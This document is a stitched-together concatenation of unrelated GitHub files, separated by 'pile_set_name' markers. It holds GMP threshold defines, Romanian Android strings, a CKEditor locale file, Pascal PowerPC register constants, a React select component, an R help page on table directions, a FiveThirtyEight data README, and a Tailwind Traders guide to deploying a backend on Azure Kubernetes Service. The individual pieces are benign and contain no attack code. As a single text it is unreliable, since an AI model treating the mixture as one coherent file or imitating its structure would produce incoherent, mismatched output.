#define MULLO_MUL_N_THRESHOLD 6633
#define DC_DIV_QR_THRESHOLD 38
#define DC_DIVAPPR_Q_THRESHOLD 123
#define DC_BDIV_QR_THRESHOLD 36
#define DC_BDIV_Q_THRESHOLD 26
#define INV_MULMOD_BNM1_THRESHOLD 35
#define INV_NEWTON_THRESHOLD 163
#define INV_APPR_THRESHOLD 147
#define BINV_NEWTON_THRESHOLD 230
#define REDC_1_TO_REDC_2_THRESHOLD 10
#define REDC_2_TO_REDC_N_THRESHOLD 54
#define MU_DIV_QR_THRESHOLD 1187
#define MU_DIVAPPR_Q_THRESHOLD 1187
#define MUPI_DIV_QR_THRESHOLD 75
#define MU_BDIV_QR_THRESHOLD 1078
#define MU_BDIV_Q_THRESHOLD 1142
#define POWM_SEC_TABLE 2,65,322,1036,2699
#define MATRIX22_STRASSEN_THRESHOLD 16
#define HGCD_THRESHOLD 142
#define HGCD_APPR_THRESHOLD 177
#define HGCD_REDUCE_THRESHOLD 2121
#define GCD_DC_THRESHOLD 345
#define GCDEXT_DC_THRESHOLD 372
#define JACOBI_BASE_METHOD 4
#define GET_STR_DC_THRESHOLD 12
#define GET_STR_PRECOMPUTE_THRESHOLD 20
#define SET_STR_DC_THRESHOLD 378
#define SET_STR_PRECOMPUTE_THRESHOLD 1585
#define FAC_DSC_THRESHOLD 351
#define FAC_ODD_THRESHOLD 43
| {
"pile_set_name": "Github"
} |
<?xml version='1.0' encoding='UTF-8'?>
<resources>
<string name="cant_call">Nu pot apela</string>
<string name="rewrite">Rescriere</string>
<string name="stop_processing">Opreste procesarea</string>
<string name="direct_call">Apeleaza direct</string>
<string name="auto_answer">Raspuns automat</string>
<string name="starts_with">Incepe cu</string>
<string name="ends_with">Se termina cu</string>
<string name="contains">Conține</string>
<string name="has_exactly_n_digits">Are exact N poziții</string>
<string name="has_more_than_n_digits">Are mai mult de N poziții</string>
<string name="is_exactly">Este fix</string>
<string name="custom_regexp">Expresie regulata personalizata</string>
<string name="replace_match_by">Inlocuieste cu</string>
<string name="replace_all_by">Inlocuieste tot cu</string>
</resources>
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<!--
~ This file is part of the PhotoEditor Software Development Kit.
~
~ Copyright (C) 2019 img.ly GmbH <[email protected]>
~ All rights reserved.
~
~ Redistribution and use in source and binary forms, without
~ modification, are permitted provided that the following license agreement
~ is approved and a legal/financial contract was signed by the user.
~
~ The license agreement can be found under the following link:
~
~ https://www.photoeditorsdk.com/LICENSE.txt
-->
<selector xmlns:android="http://schemas.android.com/apk/res/android">
<item android:state_selected="true"
android:color="@color/imgly_icon_color_active"/>
<item android:color="@color/imgly_icon_color"/>
</selector> | {
"pile_set_name": "Github"
} |
Motoya L Cider W3 and L Mulberry W3 TrueType fonts from Android.
| {
"pile_set_name": "Github"
} |
/*
Copyright (c) 2003-2014, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license
*/
// Toolbar plugin UI strings for the 'en-au' (Australian English) locale.
// Entries flagged "MISSING" are untranslated copies of the base English
// strings, left tagged for the CKEditor translation tooling.
CKEDITOR.plugins.setLang( 'toolbar', 'en-au', {
toolbarCollapse: 'Collapse Toolbar', // MISSING
toolbarExpand: 'Expand Toolbar', // MISSING
// Display names for the grouped toolbar sections.
toolbarGroups: {
document: 'Document',
clipboard: 'Clipboard/Undo',
editing: 'Editing',
forms: 'Forms',
basicstyles: 'Basic Styles',
paragraph: 'Paragraph',
links: 'Links',
insert: 'Insert',
styles: 'Styles',
colors: 'Colors',
tools: 'Tools'
},
toolbars: 'Editor toolbars'
} );
| {
"pile_set_name": "Github"
} |
{$IFDEF OGC_INTERFACE}
{$ifdef _LANGUAGE_ASSEMBLY}
(* Condition Register Bit Fields *)
const
cr0 = 0;
cr1 = 1;
cr2 = 2;
cr3 = 3;
cr4 = 4;
cr5 = 5;
cr6 = 6;
cr7 = 7;
(* General Purpose Registers (GPRs) *)
r0 = 0;
r1 = 1;
sp = 1;
r2 = 2;
toc = 2;
r3 = 3;
r4 = 4;
r5 = 5;
r6 = 6;
r7 = 7;
r8 = 8;
r9 = 9;
r10 = 10;
r11 = 11;
r12 = 12;
r13 = 13;
r14 = 14;
r15 = 15;
r16 = 16;
r17 = 17;
r18 = 18;
r19 = 19;
r20 = 20;
r21 = 21;
r22 = 22;
r23 = 23;
r24 = 24;
r25 = 25;
r26 = 26;
r27 = 27;
r28 = 28;
r29 = 29;
r30 = 30;
r31 = 31;
(* Floating Point Registers (FPRs) *)
fr0 = 0;
fr1 = 1;
fr2 = 2;
fr3 = 3;
fr4 = 4;
fr5 = 5;
fr6 = 6;
fr7 = 7;
fr8 = 8;
fr9 = 9;
fr10 = 10;
fr11 = 11;
fr12 = 12;
fr13 = 13;
fr14 = 14;
fr15 = 15;
fr16 = 16;
fr17 = 17;
fr18 = 18;
fr19 = 19;
fr20 = 20;
fr21 = 21;
fr22 = 22;
fr23 = 23;
fr24 = 24;
fr25 = 25;
fr26 = 26;
fr27 = 27;
fr28 = 28;
fr29 = 29;
fr30 = 30;
fr31 = 31;
vr0 = 0;
vr1 = 1;
vr2 = 2;
vr3 = 3;
vr4 = 4;
vr5 = 5;
vr6 = 6;
vr7 = 7;
vr8 = 8;
vr9 = 9;
vr10 = 10;
vr11 = 11;
vr12 = 12;
vr13 = 13;
vr14 = 14;
vr15 = 15;
vr16 = 16;
vr17 = 17;
vr18 = 18;
vr19 = 19;
vr20 = 20;
vr21 = 21;
vr22 = 22;
vr23 = 23;
vr24 = 24;
vr25 = 25;
vr26 = 26;
vr27 = 27;
vr28 = 28;
vr29 = 29;
vr30 = 30;
vr31 = 31;
{$endif _LANGUAGE_ASSEMBLY}
const
SPRG0 = 272;
SPRG1 = 273;
SPRG2 = 274;
SPRG3 = 275;
PMC1 = 953;
PMC2 = 954;
PMC3 = 957;
PMC4 = 958;
MMCR0 = 952;
MMCR1 = 956;
LINK_REGISTER_CALLEE_UPDATE_ROOM = 4;
EXCEPTION_NUMBER = 8;
SRR0_OFFSET = 12;
SRR1_OFFSET = 16;
GPR0_OFFSET = 20;
GPR1_OFFSET = 24;
GPR2_OFFSET = 28;
GPR3_OFFSET = 32;
GPR4_OFFSET = 36;
GPR5_OFFSET = 40;
GPR6_OFFSET = 44;
GPR7_OFFSET = 48;
GPR8_OFFSET = 52;
GPR9_OFFSET = 56;
GPR10_OFFSET = 60;
GPR11_OFFSET = 64;
GPR12_OFFSET = 68;
GPR13_OFFSET = 72;
GPR14_OFFSET = 76;
GPR15_OFFSET = 80;
GPR16_OFFSET = 84;
GPR17_OFFSET = 88;
GPR18_OFFSET = 92;
GPR19_OFFSET = 96;
GPR20_OFFSET = 100;
GPR21_OFFSET = 104;
GPR22_OFFSET = 108;
GPR23_OFFSET = 112;
GPR24_OFFSET = 116;
GPR25_OFFSET = 120;
GPR26_OFFSET = 124;
GPR27_OFFSET = 128;
GPR28_OFFSET = 132;
GPR29_OFFSET = 136;
GPR30_OFFSET = 140;
GPR31_OFFSET = 144;
GQR0_OFFSET = 148;
GQR1_OFFSET = 152;
GQR2_OFFSET = 156;
GQR3_OFFSET = 160;
GQR4_OFFSET = 164;
GQR5_OFFSET = 168;
GQR6_OFFSET = 172;
GQR7_OFFSET = 176;
CR_OFFSET = 180;
LR_OFFSET = 184;
CTR_OFFSET = 188;
XER_OFFSET = 192;
MSR_OFFSET = 196;
DAR_OFFSET = 200;
STATE_OFFSET = 204;
MODE_OFFSET = 206;
FPR0_OFFSET = 208;
FPR1_OFFSET = 216;
FPR2_OFFSET = 224;
FPR3_OFFSET = 232;
FPR4_OFFSET = 240;
FPR5_OFFSET = 248;
FPR6_OFFSET = 256;
FPR7_OFFSET = 264;
FPR8_OFFSET = 272;
FPR9_OFFSET = 280;
FPR10_OFFSET = 288;
FPR11_OFFSET = 296;
FPR12_OFFSET = 304;
FPR13_OFFSET = 312;
FPR14_OFFSET = 320;
FPR15_OFFSET = 328;
FPR16_OFFSET = 336;
FPR17_OFFSET = 344;
FPR18_OFFSET = 352;
FPR19_OFFSET = 360;
FPR20_OFFSET = 368;
FPR21_OFFSET = 376;
FPR22_OFFSET = 384;
FPR23_OFFSET = 392;
FPR24_OFFSET = 400;
FPR25_OFFSET = 408;
FPR26_OFFSET = 416;
FPR27_OFFSET = 424;
FPR28_OFFSET = 432;
FPR29_OFFSET = 440;
FPR30_OFFSET = 448;
FPR31_OFFSET = 456;
FPSCR_OFFSET = 464;
PSR0_OFFSET = 472;
PSR1_OFFSET = 480;
PSR2_OFFSET = 488;
PSR3_OFFSET = 496;
PSR4_OFFSET = 504;
PSR5_OFFSET = 512;
PSR6_OFFSET = 520;
PSR7_OFFSET = 528;
PSR8_OFFSET = 536;
PSR9_OFFSET = 544;
PSR10_OFFSET = 552;
PSR11_OFFSET = 560;
PSR12_OFFSET = 568;
PSR13_OFFSET = 576;
PSR14_OFFSET = 584;
PSR15_OFFSET = 592;
PSR16_OFFSET = 600;
PSR17_OFFSET = 608;
PSR18_OFFSET = 616;
PSR19_OFFSET = 624;
PSR20_OFFSET = 632;
PSR21_OFFSET = 640;
PSR22_OFFSET = 648;
PSR23_OFFSET = 656;
PSR24_OFFSET = 664;
PSR25_OFFSET = 672;
PSR26_OFFSET = 680;
PSR27_OFFSET = 688;
PSR28_OFFSET = 696;
PSR29_OFFSET = 704;
PSR30_OFFSET = 712;
PSR31_OFFSET = 720;
(*
* maintain the EABI requested 8 bytes aligment
* As SVR4 ABI requires 16, make it 16 (as some
* exception may need more registers to be processed...)
*)
EXCEPTION_FRAME_END = 728;
IBAT0U = 528;
IBAT0L = 529;
IBAT1U = 530;
IBAT1L = 531;
IBAT2U = 532;
IBAT2L = 533;
IBAT3U = 534;
IBAT3L = 535;
IBAT4U = 560;
IBAT4L = 561;
IBAT5U = 562;
IBAT5L = 563;
IBAT6U = 564;
IBAT6L = 565;
IBAT7U = 566;
IBAT7L = 567;
DBAT0U = 536;
DBAT0L = 537;
DBAT1U = 538;
DBAT1L = 539;
DBAT2U = 540;
DBAT2L = 541;
DBAT3U = 542;
DBAT3L = 543;
DBAT4U = 568;
DBAT4L = 569;
DBAT5U = 570;
DBAT5L = 571;
DBAT6U = 572;
DBAT6L = 573;
DBAT7U = 574;
DBAT7L = 575;
HID0 = 1008;
HID1 = 1009;
HID2 = 920;
HID4 = 1011;
GQR0 = 912;
GQR1 = 913;
GQR2 = 914;
GQR3 = 915;
GQR4 = 916;
GQR5 = 917;
GQR6 = 918;
GQR7 = 919;
L2CR = 1017;
WPAR = 921;
DMAU = 922;
DMAL = 923;
MSR_RI = $00000002;
MSR_DR = $00000010;
MSR_IR = $00000020;
MSR_IP = $00000040;
MSR_SE = $00000400;
MSR_ME = $00001000;
MSR_FP = $00002000;
MSR_POW = $00004000;
MSR_EE = $00008000;
PPC_ALIGNMENT = 8;
PPC_CACHE_ALIGNMENT = 32;
{$ENDIF OGC_INTERFACE}
| {
"pile_set_name": "Github"
} |
import React from 'react'
import PropTypes from 'prop-types'
const Picker = ({ value, onChange, options }) => (
<span>
<h1>{value}</h1>
<select onChange={e => onChange(e.target.value)}
value={value}>
{options.map(option =>
<option value={option} key={option}>
{option}
</option>)
}
</select>
</span>
)
Picker.propTypes = {
options: PropTypes.arrayOf(
PropTypes.string.isRequired
).isRequired,
value: PropTypes.string.isRequired,
onChange: PropTypes.func.isRequired
}
export default Picker
| {
"pile_set_name": "Github"
} |
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/direction.R
\name{direction}
\alias{direction}
\title{Directions from data cells to headers}
\description{
How to use functions with a \code{direction} parameter.
Data cells relate to header cells by their proximity in a given direction.
The point of view is always \emph{from} the data cell \emph{to} the header. For
example, the direction \code{"up"} means "from each data cell go directly up to a
cell at the edge of the table, which is the header cell."
Scroll down to the "Tables" section for a visual explanation.
Legacy directions \code{"N"}, \code{"NNW"}, \code{"W"}, \code{"WNW"}, etc. are still supported.
Scroll down to the "Legacy directions" section for how they map to the new
directions.
\itemize{
\item \code{"up"} means from each data cell go directly up to a cell at the edge of
the table, which is the header cell.
\item \code{"up-left"} means from each data cell go directly up to a cell at the edge
of the table, then if the cell is blank go left until a cell that has a
value, which is the header cell.
\item \code{"up-right"} means from each data cell go directly up to a cell at the edge
of the table, then if the cell is blank go right until a cell that has a
value, which is the header cell.
\item \code{"left"} means from each data cell go directly left to a cell at the edge
of the table, which is the header cell.
\item \code{"left-up"} means from each data cell go directly left to a cell at the
edge of the table, then if the cell is blank go up until a cell that has
a value, which is the header cell.
\item \code{"left-down"} means from each data cell go directly left to a cell at the
edge of the table, then if the cell is blank go down until a cell that
has a value, which is the header cell.
\item \code{"right"} means from each data cell go directly right to a cell at the edge
of the table, which is the header cell.
\item \code{"right-up"} means from each data cell go directly right to a cell at the
edge of the table, then if the cell is blank go up until a cell that has
a value, which is the header cell.
\item \code{"right-down"} means from each data cell go directly right to a cell at the
edge of the table, then if the cell is blank go down until a cell that
has a value, which is the header cell.
\item \code{"down"} means from each data cell go directly down to a cell at the edge
of the table, which is the header cell.
\item \code{"down-left"} means from each data cell go directly down to a cell at the
edge of the table, then if the cell is blank go left until a cell that
has a value, which is the header cell.
\item \code{"down-right"} means from each data cell go directly down to a cell at the
edge of the table, then if the cell is blank go right until a cell that
has a value, which is the header cell.
}
}
\section{-ish}{
The difference between \code{"up"} and \code{"up-ish"} (and similar pairs of directions)
is that \code{"up"} finds headers directly above the data cell, whereas \code{"up-ish"}
matches the nearest header, whether above-left, above-right or directly above
the data cell. This is useful for matching headers that are not aligned to
the edge of the data cells that they refer to. There can be a tie in the
directions \code{"up-ish"}, \code{"down-ish"}, \code{"left-ish"} and \code{"right-ish"} , causing
\code{NA}s to be returned in the place of header values. Avoid ties by using
\code{\link[=justify]{justify()}} first to align header cells to the corner of the data cells they
describe.
\itemize{
\item \code{"up-ish"} means the closest cell at the top edge of the table without
crossing a border defined by the \code{border} parameter.
\item \code{"left-ish"} means the closest cell at the left-hand edge of the table
without crossing a border defined by the \code{border} parameter.
\item \code{"right-ish"} means the closest cell at the right-hand edge of the table
without crossing a border defined by the \code{border} parameter.
\item \code{"down-ish"} means the closest cell at the bottom edge of the table without
crossing a border defined by the \code{border} parameter.
}
}
\section{Tables}{
\preformatted{+----------------+-------------+-------------+
| | up-left | up-left |
+ +-------------+-------------+
| | up | up | up | up |
+----------------+------+------+------+------+
| left-up | left | data | data | data | data |
+ +------+------+------+------+------+
| | left | data | data | data | data |
+---------+------+------+------+------+------+
| left-up | left | data | data | data | data |
+ +------+------+------+------+------+
| | left | data | data | data | data |
+---------+------+------+------+------+------+
}\preformatted{+-------------+-------------+------------------+
| up-right | up-right | |
+-------------+-------------+ +
| up | up | up | up | |
+------+------+------+------+------------------+
| data | data | data | data | right | right-up |
+------+------+------+------+-------+ +
| data | data | data | data | right | |
+------+------+------+------+-------+----------+
| data | data | data | data | right | right-up |
+------+------+------+------+-------+ +
| data | data | data | data | right | |
+------+------+------+------+-------+----------+
}\preformatted{+-----------+------+------+------+------+------+
| | left | data | data | data | data |
+ +------+------+------+------+------+
| left-down | left | data | data | data | data |
+-----------+------+------+------+------+------+
| | left | data | data | data | data |
+ +------+------+------+------+------+
| left-down | left | data | data | data | data |
+-----------+------+------+------+------+------+
| | down | down | down | down |
+ +------+------+------+------+
| | down-left | down-left |
+-----------+------+-------------+-------------+
}\preformatted{+------+------+------+------+-------+------------+
| data | data | data | data | right | |
+------+------+------+------+-------+ +
| data | data | data | data | right | right-down |
+------+------+------+------+-------+------------+
| data | data | data | data | right | |
+------+------+------+------+-------+ +
| data | data | data | data | right | right-down |
+------+------+------+------+-------+------------+
| down | down | down | down | |
+------+------+------+------+ +
| down-right | down-right | |
+-------------+-------------+--------------------+
}\preformatted{+-----------------+----------------------+-----------------------------+
| | up-ish | up-ish |
+ +----------------------+-----------------------------+
| | up | up | up | up | up | up | up |
+-----------------+------+--------+------+------+------+--------+------+
| | left | data | data | data | data | data | data | data |
+ +------+------+--------+------+------+------+--------+------+
| left-ish | left | data | data | data | data | data | data | data |
+ +------+------+--------+------+------+------+--------+------+
| | left | data | data | data | data | data | data | data |
+----------+------+------+--------+------+------+------+--------+------+
| | left | data | data | data | data | data | data | data |
+ +------+------+--------+------+------+------+--------+------+
| | left | data | data | data | data | data | data | data |
+ +------+------+--------+------+------+------+--------+------+
| left-ish | left | data | data | data | data | data | data | data |
+ +------+------+--------+------+------+------+--------+------+
| | left | data | data | data | data | data | data | data |
+----------+------+------+--------+------+------+------+--------+------+
}\preformatted{+------+----------+------+------+------+----------+------+-------+-----------+
| data | data | data | data | data | data | data | right | |
+------+----------+------+------+------+----------+------+-------+ +
| data | data | data | data | data | data | data | right | right-ish |
+------+----------+------+------+------+----------+------+-------+ +
| data | data | data | data | data | data | data | right | |
+------+----------+------+------+------+----------+------+-------+-----------+
| data | data | data | data | data | data | data | right | |
+------+----------+------+------+------+----------+------+-------+ +
| data | data | data | data | data | data | data | right | |
+------+----------+------+------+------+----------+------+-------+ +
| data | data | data | data | data | data | data | right | right-ish |
+------+----------+------+------+------+----------+------+-------+ +
| data | data | data | data | data | data | data | right | |
+------+----------+------+------+------+----------+------+-------+-----------+
| down | down | down | down | down | down | down | |
+------+----------+------+------+------+----------+------+ +
| down-ish | down-ish | |
+------------------------+-------------------------------+-------------------+
}
}
\section{Legacy directions}{
Older versions of unpivotr used different names for the directions, based on
the points of the compass. These are still supported but are discouraged.\preformatted{| old direction | new direction |
|---------------|---------------|
| N | up |
| NNW | up-left |
| NNE | up-right |
| W | left |
| WNW | left-up |
| WSW | left-down |
| E | right |
| ENE | right-up |
| ESE | right-down |
| S | down |
| SSW | down-left |
| SSE | down-right |
}
}
| {
"pile_set_name": "Github"
} |
# Tarantino
This folder contains data behind the story [A Complete Catalog Of Every Time Someone Cursed Or Bled Out In A Quentin Tarantino Movie](http://fivethirtyeight.com/features/complete-catalog-curses-deaths-quentin-tarantino-films).
Header | Definition
---|---------
`movie` | Film title
`type` | Whether the event was a profane word or a death
`word` | The specific profane word, if the event was a word
`minutes_in` | The number of minutes into the film the event occurred
Source: Author’s tally | {
"pile_set_name": "Github"
} |
# Managing backend with Azure Kubernetes Service (AKS)
## Key Takeaway
There are 2 features for the developers and operations team to consider as key takeaways from this demo:
1. **Introduction to AKS** - Azure Kubernetes Service (AKS) provides a managed Kubernetes-based orchestration service. It provides auto-patching, auto-scaling and updates support which enables you to use the full breadth of the Kubernetes ecosystem. In this demo you will learn how you can deploy containers in AKS by creating the cluster, deploying the services and managing the resources in Azure.
1. **Azure Dev Spaces** - Azure Dev Spaces allows you to test and iteratively develop your entire microservices application running in Azure Kubernetes Service (AKS) without the need to replicate or mock dependencies. Azure Dev Spaces reduces the burden and complexity of collaborating with your team in a shared Azure Kubernetes Service (AKS) cluster as well as running and debugging containers directly in AKS.
1. **Virtual Nodes** - A first-of-its-kind serverless computing option with AKS enables you to provision and scale your Kubernetes based apps more efficiently. Virtual Node enables you to elastically provision additional nodes inside your Kubernetes clusters in just seconds. This gives you the flexibility and the portability of containers while also ensuring that you pay only for the compute resources that you need and use.
# Before you begin
Pre-requisites for this deployment:
- Download or clone the code repository [Tailwind Traders Backend](https://github.com/Microsoft/TailwindTraders-Backend)
- A terminal with
- Bash environment with [jq](https://stedolan.github.io/jq/) installed **-OR-**
- Powershell environment
- [Azure CLI 2.0](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) installed.
- [Kubectl](https://kubernetes.io/docs/tasks/tools/install-kubectl/) installed.
- Docker installed
**Note**: The easiest way to have a working Bash environment on Windows is [enabling the WSL](https://docs.microsoft.com/en-us/windows/wsl/install-win10) and installing a Linux distro from the Windows Store.
Let us explore Azure Kubernetes Service to demonstrate how you will be able to take advantage of Kubernetes on Azure to deploy containers and save money using our new Virtual Node service for scaling
## Walkthrough: Deploying the backend services
1. Creating the **Azure Resources**
A PowerShell script is provided in the path `TailwindTraders-Backend/Deploy/powershell/Deploy-Arm-Azure.ps1` which needs to be executed to create resources required for the lab scenario.
Open PowerShell in **Administrator** mode, navigate to the local path where **Tailwind Traders Backend** repo has been cloned and execute the script below -
```
.\Deploy-Arm-Azure.ps1
```
Provide a non-existent **Resource Group** name, valid **Location** as input parameters.
Make a note of the output details of **Service Principal**, **Db Admin** and **Db Password** since it is required in the further exercises.
1. Connecting **kubectl to AKS**
From the terminal type:
- `az aks get-credentials -n <your-aks-name> -g <resource-group-name>` to download the configuration files that `kubectl` needs to connect to your AKS.
At this point if you type `kubectl config current-context` the name of your AKS cluster should be displayed. That means that `kubectl` is ready to use your AKS.

1. Installing **Tiller on AKS**
Helm is a tool to deploy resources in a Kubernetes cluster in a clean and simple manner. It is composed of two tools, one client-side (the Helm client) that needs to be installed on your machine, and a server component called _Tiller_ that must be installed on the Kubernetes cluster.
To install Helm, refer to its [installation page](https://docs.helm.sh/using_helm/#installing-helm). Once Helm is installed, _Tiller_ must be deployed on the cluster. For deploying _Tiller_, navigate to the `/Deploy` under TailwindTraders-Backend repository and run the `add-tiller.sh` (from Bash) or the `Add-Tiller.ps1` (from `/Deploy/powershell`).
Once installed, helm commands like `helm ls` should work without any error.
If you face an error - "Error: could not find a ready tiller pod", then run **helm init --upgrade** to upgrade tiller and execute the `helm ls` command again.
1. Configuring **services** with auto generation of \_gvalues file
Before deploying services using Helm, you need to setup the configuration by editing the file `helm/gvalues.yaml` and put the secrets, connection strings and all the configuration.
Generating a valid _gvalues_ file can be a bit harder, so there is a PowerShell script that can do all work by you. This script assumes that all resources are deployed in the same resource group, and this resource group contains only the Tailwind Traders resources. Also assumes the Azure resources have been created using the tools provided in this repo.
To auto-generate your _gvalues_ file just go to `/Deploy/powershell` folder and from a PowerShell window, type the following:
```
.\Generate-Config.ps1 -resourceGroup <your-resource-group> -sqlPwd <sql-password> -outputFile helm\__values\<name-of-your-file>
```
The parameters that `Generate-Config.ps1` accepts are:
- `-resourceGroup`: Resource group where all Azure resources are. **Mandatory**
    - `-sqlPwd`: Password of SQL Servers and PostgreSQL server. This parameter is **mandatory** because it can't be read using Azure CLI
- `-forcePwd`: If `$true`, the scripts updates the SQL Server and PostgreSQL to set their password to the value of `sqlPwd`. Defaults to `$false`.
- `-outputFile`: Full path of the output file to generate. A good idea is to generate a file in `/Deploy/helm/__values/` folder as this folder is ignored by Git. If not passed the result file is written on screen.
- `-gvaluesTemplate`: Template of the _gvalues_ file to use. The parameter defaults to the `/Deploy/helm/gvalues.template` which is the only template provided.
The script checks that all needed resources exist in the resource group. If some resource is missing or there is an unexpected resource, the script exits.
Once the file is generated in the `/Deploy/helm/__values/`folder, copy the file outside the `__values` folder and rename it as `gvalues.yaml`.
> **Note:** If you don't want to edit the `helm/gvalues.yaml` file you can create a copy and name it whatever you want (i. e. `helm/gvalues-prod1.yaml`). This allows you to maintain various environments. Note that **this file contains secrets so do not push into the repo!**, you can put the file in `/Deploy/helm/__values/` folder which is added to `.gitignore` to avoid accidental pushes.
1. Create **secrets on the AKS**
Docker images are stored in an ACR (a private Docker Registry hosted in Azure).
Before deploying anything on AKS, a secret must be installed to allow AKS to connect to the ACR through a Kubernetes' service account.
To do so from a Bash terminal run the file `./create-secret.sh` with following parameters:
- `-g <group>` Resource group where AKS is
- `--acr-name <name>` Name of the ACR
- `--clientid <id>` Client id of the service principal to use
- `--password <pwd>` Service principal password
    Please note that the service principal must already exist. To create a service principal, you can run the command `az ad sp create-for-rbac`.
If using PowerShell, run the `.\Create-Secret.ps1` inside `powershell` folder with following parameters:
- `-resourceGroup <group>` Resource group where AKS is
- `-acrName <name>` Name of the ACR
This will create the secret in AKS **using ACR credentials**. If ACR login is not enabled, you can create a secret by using a service principal. For use an Azure service principal following additional parameters are needed:
- `-clientId <id>` Client id of the service principal to use
- `-password <pwd>` Service principal password
1. **Build** & **deploy** images to ACR
You can **manually use docker-compose** to build and push the images to the ACR. If using compose you can set following environment variables:
* `TAG`: Will contain the generated docker images tag
* `REGISTRY`: Registry to use. This variable should be set to the login server of the ACR
Once set, you can use `docker-compose build` and `docker-compose push` to build and push the images.
Additionally, there is a PowerShell script in the `Deploy/powershell` folder, named `Build-Push.ps1`. You can use this script for building and pushing ALL images to ACR. Parameters of this script are:
* resourceGroup: Resource group where ACR is. Mandatory.
* acrName: ACR name (not login server). Mandatory.
* dockerTag: Tag to use for generated images (defaults to `latest`)
* dockerBuild: If `$true` (default value) docker images will be built using `docker-compose build`.
* dockerPush: If `$true` (default value) docker images will be push to ACR using `docker-compose push`.
This script uses `az` CLI to get ACR information, and then uses `docker-compose` to build and push the images to ACR.
    To build and push images tagged with v1 to an ACR named my-acr in resource group named my-rg:
```
.\Build-Push.ps1 -resourceGroup my-rg -dockerTag v1 -acrName my-acr
```
It might take around 10 minutes to complete the build process.
To just push the images (without building them before):
```
.\Build-Push.ps1 -resourceGroup my-rg -dockerTag v1 -acrName my-acr -dockerBuild $false
```
1. Deploying **Services**
> **Note**: If you want to add SSL/TLS support on the cluster (needed to use https on the web) please read following section **before installing the backend**.
To deploy the services from a Bash terminal, run the `./deploy-images-aks.sh` script with the following parameters:
- `-n <name>` Name of the deployment. Defaults to `my-tt`
- `--aks-name <name>` Name of the AKS
- `-g <group>` Name of the resource group
- `--acr-name <name>` Name of the ACR
- `--tag <tag>` Docker images tag to use. Defaults to `latest`
- `--charts <charts>` List of comma-separated values with charts to install. Defaults to `*` (all)
- `-f <values-file>`: Values file to use (defaults to `gvalues.yaml`)
If using PowerShell, you must run `.\Deploy-Images-Aks.ps1` inside `powershell` folder with following parameters:
- `-name <name>` Name of the deployment. Defaults to `my-tt`
- `-aksName <name>` Name of the AKS
- `-resourceGroup <group>` Name of the resource group
- `-acrName <name>` Name of the ACR
- `-tag <tag>` Docker images tag to use. Defaults to `latest`
- `-charts <charts>` List of comma-separated values with charts to install. Defaults to `*` (all)
- `-valueSFile <values-file>`: Values file to use (defaults to `gvalues.yaml`)
- `-tlsEnv prod|staging` If **SSL/TLS support has been installed**, you must use this parameter to enable https endpoints. Value must be `staging` or `prod` and must be the same value used when you installed SSL/TLS support. If SSL/TLS is not installed, you can omit this parameter.
This script will install all services using Helm and your custom configuration from file `gvalues.yaml`
The parameter `charts` allow for a selective installation of charts. Is a list of comma-separated values that mandates the services to deploy in the AKS. Values are:
- `pr` Products API
- `cp` Coupons API
- `pf` Profiles API
- `pp` Popular products API
- `st` Stock API
- `ic` Image classifier API
- `ct` Shopping cart API
- `mgw` Mobile API Gateway
- `wgw` Web API Gateway
So, using `charts pp,st` will only install the popular products and the stock API.
1. Deploying the **Images** to the storage account
    To deploy the needed images on the Azure Storage account just run the `/Deploy/powershell/Deploy-Pictures-Azure.ps1` script, with following parameters:
-resourceGroup <name>: Resource group where storage is created
-storageName <name>: Name of the storage account
Script will create blob containers and copy the images (located in `/Deploy/tailwindtraders-images` folder) to the storage account.
1. Enabling **SSL/TLS** on the cluster (**_Optional_**)
SSL/TLS support is provided by [cert-manager](https://github.com/jetstack/cert-manager) that allows auto-provisioning of TLS certificates using [Let's Encrypt](https://letsencrypt.org/) and [ACME](https://en.wikipedia.org/wiki/Automated_Certificate_Management_Environment) protocol.
To enable SSL/TLS support, you must do it **before deploying your images**. The first step is to add cert-manager to the cluster by running `images/add-cert-manager.sh` or `images/Add-Cert-Manager.ps1`. Both scripts accept no parameters and they use helm to configure cert-manager in the cluster. **This needs to be done only once**
Then you should run `powershell/Enable-Ssl.ps1` with following parameters:
- `sslSupport`: Use `staging` or `prod` to use the staging or production environments of Let's Encrypt
- `aksName`: The name of the AKS to use
- `resourceGroup`: Name of the resource group where AKS is
- `domain`: Domain to use for the SSL/TLS certificates. Is **optional** and if not used it defaults to the public domain of the AKS. Only need to use this parameter if using custom domains
Output of the script will be something like following:
```
NAME: my-tt-ssl
LAST DEPLOYED: Fri Dec 21 11:32:00 2018
NAMESPACE: default
STATUS: DEPLOYED
RESOURCES:
==> v1alpha1/Certificate
NAME AGE
tt-cert-staging 0s
==> v1alpha1/Issuer
NAME AGE
letsencrypt-staging 0s
```
You can verify that the _issuer_ object is created using `kubectl get issuers`:
    ```
PS> kubectl get issuers
NAME AGE
letsencrypt-staging 4m
```
You can verify that the _certificate_ object is created using `kubectl get certificates`:
```
PS> kubectl get certificates
NAME AGE
tt-cert-staging 4m
    ```
The _certificate_ object is not the real SSL/TLS certificate but a definition on how get one from Let's Encrypt. The certificate itself is stored in a secret, called `letsencrypt-staging` (or `letsencrypt-prod`). You should see a secret named `tt-letsencrypt-xxxx` (where `xxxx` is either `staging` or `prod`).
```
PS> kubectl get secrets
NAME TYPE DATA AGE
acr-auth kubernetes.io/dockerconfigjson 1 2d
default-token-6tm9t kubernetes.io/service-account-token 3 3d
letsencrypt-prod Opaque 1 3h
letsencrypt-staging Opaque 1 4h
tt-letsencrypt-prod kubernetes.io/tls 2 5m
ttsa-token-rkjlg kubernetes.io/service-account-token 3 2d
```
The SSL/TLS secret names are:
- `letsencrypt-staging`: Secret for the staging _issuer_. This is NOT the SSL/TLS certificate
- `tt-letsencrypt-staging`: Secret for the staging SSL/TLS certificate.
- `letsencrypt-prod`: Secret for the prod _issuer_. This is NOT the SSL/TLS certificate
- `tt-letsencrypt-prod`: Secret for the prod SSL/TLS certificate.
At this point **the support for SSL/TLS is installed, and you can install Tailwind Traders Backend on the repo**.
> **Note:** You don't need to do this again, unless you want to change the domain of the SSL/TLS certificate. In this case you need to remove the issuer and certificate objects (using `helm delete my-tt-ssl --purge` and then reinstall again)
